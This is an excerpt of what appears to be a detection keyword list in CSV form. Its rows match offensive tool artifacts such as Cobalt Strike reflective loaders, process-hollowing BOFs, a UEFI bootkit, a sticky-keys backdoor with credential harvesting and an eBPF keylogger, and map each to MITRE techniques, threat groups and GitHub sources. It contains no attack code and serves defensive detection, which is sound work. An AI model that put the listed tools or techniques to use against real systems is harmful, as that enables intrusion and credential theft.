"*boku7/BokuLoader*",".{0,1000}boku7\/BokuLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36181"
"*boku7/HOLLOW*",".{0,1000}boku7\/HOLLOW.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","1","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","36182"
"*BokuLoader.cna*",".{0,1000}BokuLoader\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36183"
"*BokuLoader.exe*",".{0,1000}BokuLoader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36184"
"*BokuLoader.x64*",".{0,1000}BokuLoader\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36185"
"*bolt://localhost:7687*",".{0,1000}bolt\:\/\/localhost\:7687.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","36186"
"*Bonfee/CVE-2022-0995*",".{0,1000}Bonfee\/CVE\-2022\-0995.{0,1000}","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","N/A","5","497","67","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z","36188"
"*BooExecutorImpl.cs*",".{0,1000}BooExecutorImpl\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36189"
"*book.hacktricks.xyz/*",".{0,1000}book\.hacktricks\.xyz\/.{0,1000}","offensive_tool_keyword","hacktricks.xyz","site often consulted by pentester","T1596 - T1592","TA0043","N/A","Black Basta","Reconnaissance","https://hacktricks.xyz","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","36190"
"*bootkit-rs.git*",".{0,1000}bootkit\-rs\.git.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","36192"
"*bootkit-rs-master*",".{0,1000}bootkit\-rs\-master.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","36193"
"*Booty\master_password_list.csv*",".{0,1000}Booty\\master_password_list\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36194"
"*BorjaMerino*Pazuzu*",".{0,1000}BorjaMerino.{0,1000}Pazuzu.{0,1000}","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tool","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","N/A","3","215","64","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z","36202"
"*Bot_MSF_Exp_*.py*",".{0,1000}Bot_MSF_Exp_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","36203"
"*Bot_Python_Poc_Log4j2_VMwareHorizon.py*",".{0,1000}Bot_Python_Poc_Log4j2_VMwareHorizon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","36204"
"*bpassthehash*",".{0,1000}bpassthehash.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36206"
"*bpf_keylogger: Log key presses and mouse button events systemwide using eBPF*",".{0,1000}bpf_keylogger\:\sLog\skey\spresses\sand\smouse\sbutton\sevents\ssystemwide\susing\seBPF.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","36207"
"*bpowerpick*",".{0,1000}bpowerpick.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36208"
"*bpowershell_import(*",".{0,1000}bpowershell_import\(.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","36209"
"*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36210"
"*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36211"
"*bpsexec_psh*",".{0,1000}bpsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36212"
"*bpsinject*",".{0,1000}bpsinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36213"
